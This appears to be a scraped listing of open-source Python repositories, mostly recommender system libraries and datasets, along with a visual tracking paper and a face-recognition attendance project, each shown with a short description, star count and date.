Transformer Meets Tracker: Exploiting Temporal Context for Robust Visual Tracking Ning Wang, Wengang Zhou, Jie Wang, and Houqiang Li Accepted by CVPR

NingWang 236 Dec 22, 2022
Crab is a flexible, fast recommender engine for Python that integrates classic information filtering recommendation algorithms in the world of scientific Python packages (numpy, scipy, matplotlib).

Crab - A Recommendation Engine library for Python Crab is a flexible, fast recommender engine for Python that integrates classic information filtering r

python-recsys 1.2k Dec 21, 2022
A Comparative Framework for Multimodal Recommender Systems

Cornac Cornac is a comparative framework for multimodal recommender systems. It focuses on making it convenient to work with models leveraging auxilia

Preferred.AI 671 Jan 3, 2023
A library for preparing, training, and evaluating scalable deep learning hybrid recommender systems using PyTorch.

collie_recs Collie is a library for preparing, training, and evaluating implicit deep learning hybrid recommender systems, named after the Border Coll

ShopRunner 97 Jan 3, 2023
Open-sourcing the Slates Dataset for recommender systems research

FINN.no Recommender Systems Slate Dataset This repository accompany the paper "Dynamic Slate Recommendation with Gated Recurrent Units and Thompson Sa

FINN.no 48 Nov 28, 2022
StackRec: Efficient Training of Very Deep Sequential Recommender Models by Iterative Stacking

StackRec: Efficient Training of Very Deep Sequential Recommender Models by Iterative Stacking Datasets You can download datasets that have been pre-pr

null 25 May 29, 2022
NVIDIA Merlin is an open source library providing end-to-end GPU-accelerated recommender systems, from feature engineering and preprocessing to training deep learning models and running inference in production.

NVIDIA Merlin NVIDIA Merlin is an open source library designed to accelerate recommender systems on NVIDIA’s GPUs. It enables data scientists, machine

null 419 Jan 3, 2023
A library for preparing, training, and evaluating scalable deep learning hybrid recommender systems using PyTorch.

collie Collie is a library for preparing, training, and evaluating implicit deep learning hybrid recommender systems, named after the Border Collie do

ShopRunner 96 Dec 29, 2022
An efficient PyTorch implementation of the evaluation metrics in recommender systems.

recsys_metrics An efficient PyTorch implementation of the evaluation metrics in recommender systems. Overview • Installation • How to use • Benchmark

Xingdong Zuo 12 Dec 2, 2022
LoL Runes Recommender With Python

LoL-Runes-Recommender Para ejecutar la aplicación se debe llamar a execute_app.p

Sebastián Salinas 1 Jan 10, 2022
Face-Recognition-based-Attendance-System - An implementation of Attendance System in python.

Face-Recognition-based-Attendance-System A real time implementation of Attendance System in python. Pre-requisites To understand the implentation of F

Muhammad Zain Ul Haque 1 Dec 31, 2021